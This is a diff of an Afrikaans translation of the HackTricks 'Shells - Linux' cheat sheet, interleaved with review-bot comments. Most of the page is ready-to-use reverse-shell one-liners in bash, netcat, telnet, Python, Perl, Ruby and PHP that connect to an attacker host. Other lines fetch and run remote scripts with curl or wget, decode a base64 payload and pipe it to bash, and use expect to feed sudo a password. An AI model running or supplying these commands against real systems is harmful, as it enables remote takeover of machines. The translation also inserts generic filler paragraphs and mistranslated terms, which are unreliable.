* As die ReverseSSH-poort deurstuurversoek suksesvol was, moet jy nou in staat wees om in te teken met die verstek wagwoord `letmeinbrudipls` in die konteks van die gebruiker wat `reverse-ssh(.exe)` uitvoer:
|
||||
```bash
|
||||
# Interactive shell access
|
||||
ssh -p 8888 127.0.0.1
|
||||
|
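Review bot: The blank line between the bullet ending in "…wat `reverse-ssh(.exe)` uitvoer:" and the following bash code fence has been dropped; the English version keeps it and every other code block on the page has one, so restore it for consistent rendering of the fence after a list item. Also "ReverseSSH-poort deurstuurversoek" should be "ReverseSSH-poortdeurstuurversoek" to match the wording of step 1.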
@ -114,25 +111,22 @@ ssh -p 8888 127.0.0.1
|
|||
# Bidirectional file transfer
|
||||
sftp -P 8888 127.0.0.1
|
||||
```
|
||||
## Geen TTY
|
||||
|
||||
## No TTY
|
||||
|
||||
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expect user input. In the following example, the password is passed to `sudo` to read a file:
|
||||
|
||||
As jy om een of ander rede nie 'n volledige TTY kan verkry nie, kan jy steeds met programme interaksie hê wat gebruikersinvoer verwag. In die volgende voorbeeld word die wagwoord aan `sudo` oorgedra om 'n lêer te lees:
|
||||
```bash
|
||||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
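Review bot: "## Geen TTY" is placed directly after the closing fence of the sftp block with no blank line, and the blank line between the intro sentence and the bash fence below it is dropped as well; the English original has both, so restore them. In the translated sentence the emphasis on **still can interact with programs** is lost ("kan jy steeds met programme interaksie hê"); keep the bold as in the source, since it is the point of the section.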
@ -1,35 +1,34 @@
|
|||
# Shells - Linux
|
||||
# Skulpe - Linux
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||
Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
|
||||
|
||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||
|
||||
***
|
||||
|
||||
**If you have questions about any of these shells you could check them with** [**https://explainshell.com/**](https://explainshell.com)
|
||||
**As jy vrae het oor enige van hierdie skulpe, kan jy dit nagaan met** [**https://explainshell.com/**](https://explainshell.com)
|
||||
|
||||
## Full TTY
|
||||
## Volledige TTY
|
||||
|
||||
**Once you get a reverse shell**[ **read this page to obtain a full TTY**](full-ttys.md)**.**
|
||||
**Sodra jy 'n omgekeerde skulp kry**[ **lees hierdie bladsy om 'n volledige TTY te verkry**](full-ttys.md)**.**
|
||||
|
||||
## Bash | sh
|
||||
|
||||
```bash
|
||||
curl https://reverse-shell.sh/1.1.1.1:3000 | bash
|
||||
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
|
||||
|
@ -42,11 +41,9 @@ exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5;
|
|||
#after getting the previous shell to get the output to execute
|
||||
exec >&0
|
||||
```
|
||||
Moenie vergeet om te kyk na ander skulpe nie: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, en bash.
|
||||
|
||||
Don't forget to check with other shells: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, and bash.
|
||||
|
||||
### Symbol safe shell
|
||||
|
||||
### Simbool veilige skulp
|
||||
```bash
|
||||
#If you need a more stable connection do:
|
||||
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
|
||||
|
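Review bot: Blank lines around code fences were removed in this hunk: "Moenie vergeet om te kyk na ander skulpe nie…" now follows the closing fence directly, and "### Simbool veilige skulp" is immediately followed by the opening bash fence. Restore the blank lines as in the English version. "Simbool veilige" should also be written as the compound "Simboolveilige".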
@ -55,38 +52,34 @@ bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
|
|||
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
|
||||
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
|
||||
```
|
||||
#### Skulverduideliking
|
||||
|
||||
#### Shell explanation
|
||||
|
||||
1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
|
||||
2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
|
||||
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special file that **represents a TCP connection to the specified IP address and port**.
|
||||
* By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine.
|
||||
4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**.
|
||||
|
||||
### Create in file and execute
|
||||
1. **`bash -i`**: Hierdie deel van die bevel begin 'n interaktiewe (`-i`) Bash-skyf.
|
||||
2. **`>&`**: Hierdie deel van die bevel is 'n kort notasie vir die **omleiding van beide standaarduitvoer** (`stdout`) en **standaardfout** (`stderr`) na dieselfde bestemming.
|
||||
3. **`/dev/tcp/<AANVALLER-IP>/<POORT>`**: Dit is 'n spesiale lêer wat 'n TCP-verbinding na die gespesifiseerde IP-adres en poort **voorstel**.
|
||||
* Deur die uitvoer- en foutstrome na hierdie lêer te **omlei**, stuur die bevel die uitset van die interaktiewe skyfsessie effektief na die aanvaller se masjien.
|
||||
4. **`0>&1`**: Hierdie deel van die bevel **omlei standaardinskrywing (`stdin`) na dieselfde bestemming as standaarduitvoer (`stdout`)**.
|
||||
|
||||
### Skep in lêer en voer uit
|
||||
```bash
|
||||
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
|
||||
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
|
||||
```
|
||||
## Voorwaartse Skulp
|
||||
|
||||
## Forward Shell
|
||||
As jy 'n **RCE kwesbaarheid** binne 'n Linux-gebaseerde webtoepassing teëkom, kan daar gevalle wees waar **dit moeilik word om 'n omgekeerde skulp te verkry** as gevolg van die teenwoordigheid van Iptables-reëls of ander filters. In sulke scenario's, oorweeg om 'n PTY-skulp binne die gekompromitteerde stelsel te skep deur gebruik te maak van pype.
|
||||
|
||||
If you encounter an **RCE vulnerability** within a Linux-based web application, there might be instances where **obtaining a reverse shell becomes difficult** due to the presence of Iptables rules or other filters. In such scenarios, consider creating a PTY shell within the compromised system using pipes.
|
||||
Jy kan die kode vind op [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
|
||||
|
||||
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
|
||||
Jy hoef net te wysig:
|
||||
|
||||
You just need to modify:
|
||||
* Die URL van die kwesbare gasheer
|
||||
* Die voorvoegsel en agtervoegsel van jou payload (indien enige)
|
||||
* Die manier waarop die payload gestuur word (koppe? data? ekstra inligting?)
|
||||
|
||||
* The URL of the vulnerable host
|
||||
* The prefix and suffix of your payload (if any)
|
||||
* The way the payload is sent (headers? data? extra info?)
|
||||
|
||||
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
|
||||
Daarna kan jy net **opdragte stuur** of selfs die `upgrade`-opdrag gebruik om 'n volledige PTY te kry (let daarop dat pype gelees en geskryf word met 'n benaderde vertraging van 1.3s).
|
||||
|
||||
## Netcat
|
||||
|
||||
```bash
|
||||
nc -e /bin/sh <ATTACKER-IP> <PORT>
|
||||
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||||
|
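Review bot: The explanation now refers to `/dev/tcp/<AANVALLER-IP>/<POORT>` while the code blocks above and below it still use `/dev/tcp/<ATTACKER-IP>/<PORT>`; the placeholders are part of the command and must not be translated, otherwise the numbered explanation no longer matches what the reader copies. Terminology in the same hunk: "Bash-skyf" and "skyfsessie" (skyf = disk) should be "Bash-skulp" and "skulpsessie" as used elsewhere in the commit, "standaardinskrywing" for stdin should be "standaardinvoer", and "Skulverduideliking" is missing a letter ("Skulpverduideliking"). The added headings "#### Skulverduideliking" and "## Voorwaartse Skulp" also sit directly after closing fences with no blank line, unlike the English lines they replace.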
@ -94,66 +87,189 @@ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp
|
|||
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
|
||||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||||
```
|
||||
|
||||
## gsocket
|
||||
|
||||
Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
|
||||
|
||||
Kyk dit na by [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
|
||||
```bash
|
||||
bash -c "$(curl -fsSL gsocket.io/x)"
|
||||
```
|
||||
|
||||
## Telnet
|
||||
|
||||
Telnet is 'n protokol wat gebruik word om 'n verbinding met 'n bediener te maak en op afstand te kommunikeer. Dit maak gebruik van 'n onversleutelde verbinding, wat beteken dat die inligting wat oorgedra word, nie geïnkodeer word nie en dus vatbaar is vir afluistering. Telnet word dikwels gebruik om toegang tot 'n bediener se opdraglyn te verkry en opdragte uit te voer.
|
||||
|
||||
### Telnet-aanvalle
|
||||
|
||||
Telnet-aanvalle is 'n metode wat deur aanvallers gebruik word om toegang tot 'n bediener te verkry deur die gebruik van swak of gesteelde legitimasie-inligting. Hierdie aanvalle kan gebruik word om ongemagtigde toegang tot 'n bediener te verkry en potensieel skadelike opdragte uit te voer.
|
||||
|
||||
### Mitigasie
|
||||
|
||||
Om Telnet-aanvalle te voorkom, moet die volgende stappe geneem word:
|
||||
|
||||
- Telnet moet gedeaktiveer word as dit nie nodig is nie.
|
||||
- As Telnet wel nodig is, moet dit slegs toeganklik wees via 'n veilige, versleutelde verbinding.
|
||||
- Sterk legitimasiebeleid moet geïmplementeer word om te verseker dat slegs geakkrediteerde gebruikers toegang tot die Telnet-diens het.
|
||||
- Die gebruik van sterk, unieke wagwoorde moet afgedwing word om die risiko van gesteelde legitimasie-inligting te verminder.
|
||||
|
||||
### Voorbeeld
|
||||
|
||||
```bash
|
||||
telnet 192.168.0.1
|
||||
```
|
||||
|
||||
In hierdie voorbeeld maak die gebruiker 'n Telnet-verbinding met die IP-adres 192.168.0.1.
|
||||
```bash
|
||||
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
|
||||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
|
||||
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
|
||||
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
|
||||
```
|
||||
## Wie is
|
||||
|
||||
## Whois
|
||||
|
||||
**Attacker**
|
||||
|
||||
**Aanvaller**
|
||||
```bash
|
||||
while true; do nc -l <port>; done
|
||||
```
|
||||
Om die bevel te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
|
||||
|
||||
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
|
||||
|
||||
**Victim**
|
||||
|
||||
**Slagoffer**
|
||||
```bash
|
||||
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
|
||||
```
|
||||
|
||||
## Python
|
||||
|
||||
Python is 'n baie gewilde programmeertaal wat algemeen gebruik word in die hacking-gemeenskap. Dit is 'n hoëvlaktaal met 'n eenvoudige sintaksis, wat dit maklik maak om te leer en te gebruik. Python bied 'n wye verskeidenheid biblioteke en modules wat spesifiek ontwerp is vir hacking en pentesting.
|
||||
|
||||
### Python-installasie
|
||||
|
||||
Om Python op Linux te installeer, kan jy die volgende opdrag gebruik:
|
||||
|
||||
```bash
|
||||
sudo apt-get install python
|
||||
```
|
||||
|
||||
### Python-skripsies uitvoer
|
||||
|
||||
Om 'n Python-skripsie uit te voer, gebruik die volgende sintaksis:
|
||||
|
||||
```bash
|
||||
python skripsie.py
|
||||
```
|
||||
|
||||
### Python-interaktiewe modus
|
||||
|
||||
Python bied 'n interaktiewe modus wat gebruik kan word om Python-kode regstreeks in die opdragreël uit te voer. Om die interaktiewe modus te begin, tik eenvoudig `python` in die opdragreël.
|
||||
|
||||
### Python-biblioteke vir hacking
|
||||
|
||||
Daar is 'n verskeidenheid Python-biblioteke wat nuttig kan wees vir hacking en pentesting. Hier is 'n paar voorbeelde:
|
||||
|
||||
- **Scapy**: 'n kragtige en veelsydige biblioteek vir netwerkpakketmanipulasie.
|
||||
- **Requests**: 'n eenvoudige en maklik om te gebruik biblioteek vir HTTP-aanvrae.
|
||||
- **BeautifulSoup**: 'n biblioteek vir die skraping van webinhoud.
|
||||
- **Paramiko**: 'n SSH-implementering vir Python.
|
||||
- **Pycrypto**: 'n biblioteek vir kriptografie-operasies.
|
||||
- **Selenium**: 'n biblioteek vir outomatiese webblaaierinteraksie.
|
||||
|
||||
### Python-bronne
|
||||
|
||||
As jy meer wil leer oor Python en hoe dit gebruik kan word vir hacking, is hier 'n paar nuttige bronne:
|
||||
|
||||
- [Python.org](https://www.python.org/): Die amptelike webwerf van Python, met dokumentasie en tutoriale.
|
||||
- [Hacking with Python](https://www.hackingwithpython.com/): 'n Gratis aanlynbron met praktiese hacking-projekte en tutoriale.
|
||||
- [Black Hat Python](https://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900): 'n Boek deur Justin Seitz wat Python-programmering toepas op hacking-scenarios.
|
||||
|
||||
Python is 'n kragtige en veelsydige taal wat 'n waardevolle hulpmiddel kan wees vir enige hacker of pentester. Deur Python te leer en te gebruik, kan jy jou vaardighede in die hacking-wêreld verbeter en meer doeltreffend word in jou pogings.
|
||||
```bash
|
||||
#Linux
|
||||
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
|
||||
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
||||
#IPv6
|
||||
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||||
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
|
||||
```
|
||||
|
||||
## Perl
|
||||
|
||||
Perl is 'n kragtige skriptaal wat algemeen gebruik word in die wêreld van hacking. Dit bied 'n verskeidenheid funksies en modules wat dit 'n gewilde keuse maak vir die uitvoer van verskillende hacking-take.
|
||||
|
||||
### Uitvoer van Perl-skrips
|
||||
|
||||
Om 'n Perl-skrip uit te voer, gebruik die volgende sintaks:
|
||||
|
||||
```bash
|
||||
perl skrip.pl
|
||||
```
|
||||
|
||||
### Basiese sintaks
|
||||
|
||||
Hier is 'n paar basiese sintaksreëls vir Perl:
|
||||
|
||||
- Kommentaar: `# Hierdie is 'n kommentaar`
|
||||
- Veranderlike toekenning: `$naam = waarde;`
|
||||
- Druk na die skerm: `print "Boodskap";`
|
||||
- Invoer vanaf die gebruiker: `$invoer = <STDIN>;`
|
||||
|
||||
### Belangrike funksies en modules
|
||||
|
||||
Perl het 'n ryk versameling funksies en modules wat nuttig kan wees vir hacking. Hier is 'n paar belangrike een:
|
||||
|
||||
- `system()`: Hierdie funksie voer 'n stelseloproepe uit en kan gebruik word om eksterne opdragte uit te voer.
|
||||
- `open()`: Hierdie funksie maak 'n lêer oop vir lees- of skryftoegang.
|
||||
- `close()`: Hierdie funksie sluit 'n oop lêer.
|
||||
- `chdir()`: Hierdie funksie verander die huidige werkspasie.
|
||||
- `unlink()`: Hierdie funksie verwyder 'n lêer van die lêersisteem.
|
||||
|
||||
### Voorbeeld van 'n Perl-skrip
|
||||
|
||||
Hier is 'n voorbeeld van 'n eenvoudige Perl-skrip wat die huidige datum en tyd druk:
|
||||
|
||||
```perl
|
||||
#!/usr/bin/perl
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
|
||||
my $datum_tyd = `date`;
|
||||
print "Die huidige datum en tyd is: $datum_tyd";
|
||||
```
|
||||
|
||||
Hierdie skrip gebruik die `date`-opdrag om die huidige datum en tyd te kry en druk dit dan na die skerm.
|
||||
|
||||
### Slotwoord
|
||||
|
||||
Perl is 'n kragtige skriptaal wat 'n verskeidenheid hacking-take kan uitvoer. Deur die gebruik van die regte funksies en modules, kan jy doeltreffend en doelgerig te werk gaan in jou hacking-projekte.
|
||||
```bash
|
||||
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
|
||||
## Ruby
|
||||
|
||||
Ruby is 'n dinamiese, objek-georiënteerde programmeertaal wat algemeen gebruik word vir webontwikkeling en skripskryf. Dit het 'n eenvoudige sintaksis en is maklik om te leer en te gebruik. Hier is 'n paar belangrike punte oor Ruby:
|
||||
|
||||
- **Interaktiewe omgewing**: Ruby het 'n interaktiewe omgewing, bekend as 'n IRB (Interactive Ruby), waar jy kode kan skryf en dit onmiddellik kan uitvoer om resultate te sien.
|
||||
|
||||
- **Objek-georiënteerd**: Ruby is 'n volledig objek-georiënteerde programmeertaal, wat beteken dat alles in Ruby 'n objek is. Dit maak gebruik van klasse en objek om funksionaliteit te organiseer en te struktureer.
|
||||
|
||||
- **Dinamies**: Ruby is 'n dinamiese programmeertaal, wat beteken dat jy veranderlikes kan skep en hulle kan toewys sonder om hulle tipes vooraf te spesifiseer. Dit maak dit maklik om kode te skryf en te verander sonder om jouself te bekommer oor tipes nie.
|
||||
|
||||
- **Gemeenskap**: Ruby het 'n aktiewe en ondersteunende gemeenskap van ontwikkelaars regoor die wêreld. Daar is baie bronne, tutoriale en biblioteke beskikbaar om jou te help om met Ruby te werk.
|
||||
|
||||
- **Rails**: Ruby on Rails is 'n gewilde webraamwerk wat gebou is op Ruby. Dit bied 'n gestandaardiseerde manier om webtoepassings te bou en maak gebruik van die krag van Ruby se objek-georiënteerde model.
|
||||
|
||||
As jy belangstel om Ruby te leer, kan jy begin deur die dokumentasie en tutoriale op die amptelike Ruby-webwerf te bestudeer. Daar is ook baie boeke en aanlynbronne beskikbaar wat jou kan help om die taal te leer en te bemeester.
|
||||
```bash
|
||||
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
|
||||
## PHP
|
||||
|
||||
PHP is 'n skripsie-taal wat algemeen gebruik word vir die ontwikkeling van webtoepassings. Dit word meestal geïnterpreteer deur 'n webbediener wat die uitvoering van PHP-kode moontlik maak. Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by PHP:
|
||||
|
||||
- **Ingeslote kode**: PHP-kode word gewoonlik ingesluit in HTML-dokumente deur gebruik te maak van die `<?php` en `?>` etikette. Hierdie kode word uitgevoer deur die webbediener voordat die HTML na die kliënt gestuur word.
|
||||
- **Dinamiese inhoud**: PHP maak dit moontlik om dinamiese inhoud op 'n webwerf te skep deur die gebruik van veranderlikes, lusse, voorwaardelike verklarings en funksies.
|
||||
- **Databasisinteraksie**: PHP kan gebruik word om te kommunikeer met 'n databasis deur middel van verskillende databasisverbindingsbiblioteke soos MySQLi en PDO.
|
||||
- **Veiligheidsoorwegings**: Dit is belangrik om sekuriteitsmaatreëls in ag te neem wanneer jy PHP-kode skryf om te verseker dat jou webtoepassing nie kwesbaar is vir aanvalle soos SQL-injeksie of kruisskripsaanvalle nie.
|
||||
- **Foutafhandeling**: PHP bied verskillende metodes om foute af te handel, insluitend die gebruik van uitsonderings en foutkodes.
|
||||
|
||||
PHP bied 'n kragtige en veelsydige raamwerk vir die ontwikkeling van webtoepassings. Dit is belangrik om 'n goeie begrip van die taal te hê en om bewus te wees van die beste praktyke vir die skryf van veilige en doeltreffende PHP-kode.
|
||||
```php
|
||||
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
|
||||
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
|
||||
|
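Review bot: the Afrikaans paragraphs added under `## Perl`, `## Ruby` and `## PHP` (from `Perl is 'n kragtige skriptaal…` through `### Slotwoord`, the five Ruby bullets, and the PHP bullet list) have no removed English line beside them in this hunk, so they are not translating anything; they are generic filler that pushes the reverse-shell one-liners, the only content a reader of this cheat sheet wants, several screens down. Suggest keeping just the translated heading and the untouched code fences. Two smaller points in the same region: `Hier is 'n paar belangrike een:` should read `Hier is 'n paar belangrikes:`; and the Perl example ``my $datum_tyd = `date`;`` spawns a shell to read the clock, which `localtime()` gives without a subprocess, so it is a poor pattern to add on a page that is otherwise about command execution.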
@ -165,59 +281,244 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|||
|
||||
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
|
||||
```
|
||||
|
||||
## Java
|
||||
|
||||
Java is 'n populaire programmeertaal wat gebruik word vir die ontwikkeling van verskeie toepassings, insluitend webtoepassings, mobiele toepassings en bedryfsagteware. Dit is 'n objekgeoriënteerde taal wat bekendheid geniet vir sy veiligheid, betroubaarheid en draagbaarheid.
|
||||
|
||||
### Voordeligheid van Java vir hackers
|
||||
|
||||
Java bied 'n paar voordelige eienskappe vir hackers:
|
||||
|
||||
- **Platformonafhanklikheid**: Java-kode kan uitgevoer word op verskillende bedryfstelsels, soos Windows, Linux en macOS, sonder om dit te hoef herskryf. Dit maak dit makliker vir hackers om hul gereedskap en aanvalskode op verskillende doelwitte te gebruik.
|
||||
|
||||
- **Groot gemeenskap**: Java het 'n groot gemeenskap van ontwikkelaars en ondersteuners wat gereed is om hulp te bied en kennis te deel. Hierdie gemeenskap bied 'n ryk bron van inligting, hulpmiddels en biblioteke wat hackers kan gebruik om hul vaardighede te verbeter en aanvalskode te ontwikkel.
|
||||
|
||||
- **Veiligheidsmaatreëls**: Java het ingeboude veiligheidsmaatreëls wat die uitvoering van skadelike kodes beperk. Hierdie maatreëls sluit in 'n streng toegangsbeheerstelsel, geheuebestuur en 'n sandboksomgewing vir die uitvoering van onbekende kodes. Alhoewel dit 'n uitdaging kan wees vir hackers om hierdie maatreëls te omseil, kan dit ook 'n geleentheid bied om kreatiewe maniere te vind om dit te doen.
|
||||
|
||||
### Java-hackingtegnieke
|
||||
|
||||
Java bied 'n verskeidenheid hackingtegnieke wat hackers kan gebruik om toegang te verkry tot stelsels, data te ontgin en aanvalle uit te voer. Hier is 'n paar voorbeelde van sulke tegnieke:
|
||||
|
||||
- **Java Remote Method Invocation (RMI)**: Hierdie tegniek maak dit moontlik vir 'n hacker om kode uit te voer op 'n afgeleë Java-stelsel deur gebruik te maak van die RMI-meganisme. Dit kan gebruik word om toegang te verkry tot gevoelige data of om skadelike kodes op die doelwitstelsel uit te voer.
|
||||
|
||||
- **Java Applet-aanvalle**: Java-applets is klein programme wat in 'n webblaaier uitgevoer kan word. Hackers kan kwaadwillige applets ontwikkel wat gebruik maak van swakplekke in die Java-beveiliging om toegang te verkry tot die stelsel van die gebruiker en skadelike aksies uit te voer.
|
||||
|
||||
